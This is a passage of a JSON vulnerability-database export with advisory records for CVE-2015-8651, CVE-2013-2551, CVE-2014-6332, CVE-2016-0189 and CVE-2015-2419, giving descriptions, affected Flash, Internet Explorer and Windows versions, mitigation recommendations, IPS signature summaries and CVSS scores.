Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151.0 \n * Adobe Flash Player 9.0.152.0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Gentoo Linux \n * Microsoft Edge \n * 
Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE openSUSE Evergreen 11.4 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-12-28T00:00:00", "type": "symantec", "title": "Adobe Flash Player and AIR CVE-2015-8651 Unspecified Integer Overflow Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-8651"], "modified": "2015-12-28T00:00:00", "id": "SMNTC-79705", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/79705", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:37", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability due to a use-after-free condition. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. 
Internet Explorer 6, 7, 8, 9, and 10 are vulnerable.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. 
Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-2551 Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-03-11T00:00:00", "id": "SMNTC-58570", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58570", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:07", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code and gain elevated privileges in the context of the currently logged-in user. 
Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0.0 Standard \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.1.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Client Registration Server 6.2 \n * Avaya Meeting Exchange - Recording Server 5.0.1 \n * Avaya Meeting Exchange - Recording Server 5.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.2 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.2 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Meeting Exchange - Webportal 6.2 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Application Server 6.2 \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based 
Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 Edition Service Pack 2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from a successful exploit.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2014-11-11T00:00:00", "type": "symantec", "title": "Microsoft Windows CVE-2014-6332 OLE Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-11T00:00:00", "id": "SMNTC-70952", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70952", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:19", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. 
Internet Explorer 9, 10, and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n * Microsoft JScript 5.8 \n * Microsoft VBScript 5.7 \n * Microsoft VBScript 5.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2016-0189 Scripting Engine Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-0189"], "modified": "2016-05-10T00:00:00", "id": "SMNTC-90012", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/90012", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks may cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya CallPilot 5.1.0 \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious 
activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2015-2419 JScript9 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-2419"], "modified": "2015-07-14T00:00:00", "id": "SMNTC-75661", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75661", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:48:09", "description": "Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x\nbefore 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux,\nAdobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR\nSDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code\nvia unspecified vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-12-28T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8651", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2015-8651"], "modified": "2015-12-28T00:00:00", "id": "UB:CVE-2015-8651", "href": "https://ubuntu.com/security/CVE-2015-8651", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:44:59", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a design flaw that could lead to integer overflow. A remote attacker can exploit this vulnerability by enticing a victim to open specially crafted SWF files.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-12-28T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Integer Overflow Remote Code Execution (APSB16-01: CVE-2015-8651)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2017-10-04T00:00:00", "id": "CPAI-2015-1429", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T03:13:50", "description": "Javascript may contain variables assigned with overly long strings. 
This behavior may indicate an exploitation attempt.", "cvss3": {}, "published": "2013-12-31T00:00:00", "type": "checkpoint_advisories", "title": "Suspicious Javascript Containing Overly Long Strings (CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2014-02-05T00:00:00", "id": "CPAI-2014-0372", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T03:12:38", "description": "A buffer overflow vulnerability has been reported in Internet Explorer while accessing a dynamic array of attributes of a VML shape object. The vulnerability is due to insufficient correctness check of a VML shape object attribute and may lead to memory corruption in such a way that will allow code execution in the context of the current user. 
A remote attacker could trigger this flaw by convincing a victim to open a malicious HTML file.", "cvss3": {}, "published": "2013-05-14T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer VML Objects Use After Free (MS13-037; CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2017-01-11T00:00:00", "id": "CPAI-2013-1695", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T03:14:18", "description": "Javascript may contain overly large amount of abnormal variable names. 
This behavior may indicate an exploitation attempt.", "cvss3": {}, "published": "2013-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Suspicious Javascript Variable Names (CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2014-06-30T00:00:00", "id": "CPAI-2014-0371", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T07:02:53", "description": "HTML files may include a text tag containing an overly long and suspicious strings. This behavior may indicate an exploitation attempt.", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "checkpoint_advisories", "title": "Suspicious HTML Containing Overly Long Text (CVE-2013-2551)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2014-02-26T00:00:00", "id": "CPAI-2014-0948", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T15:30:30", "description": "A new obfuscation technique of remote code execution vulnerability has been reported in Microsoft Windows Object Linking and Embedding (OLE). The vulnerability is due to an improper access to memory objects by Internet Explorer. 
A remote attacker can exploit this issue by enticing target users to view a specially crafted web-page.", "cvss3": {}, "published": "2019-02-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows OLE Obfuscated Automation Array Remote Code Execution (CVE-2014-6332)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2019-02-27T00:00:00", "id": "CPAI-2019-0214", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:54:01", "description": "A remote code execution vulnerability has been reported in Microsoft Windows Object Linking and Embedding (OLE). The vulnerability is due to an improper access to memory objects by Internet Explorer. 
A remote attacker can exploit this issue by enticing target users to view a specially crafted web-page.", "cvss3": {}, "published": "2014-11-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows OLE Automation Array Remote Code Execution (MS14-064; CVE-2014-6332)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2019-03-07T00:00:00", "id": "CPAI-2014-1940", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:18", "description": "A use after free vulnerability exists in Microsoft Internet Explorer. The root cause is a heap corruption when dealing with a corrupted VBScript array size. 
A successful exploitation of this issue could allow an attacker to execute arbitrary code on the remote system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (MS16-051: CVE-2016-0189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189"], "modified": "2019-06-05T00:00:00", "id": "CPAI-2016-0309", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:44:29", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. 
A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Jscript9 Memory Corruption (MS15-065: CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2021-09-01T00:00:00", "id": "CPAI-2015-0843", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T07:39:40", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. 
A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2015-1058", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-19T10:57:56", "description": "Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x before 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux, Adobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR SDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code via unspecified vectors.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 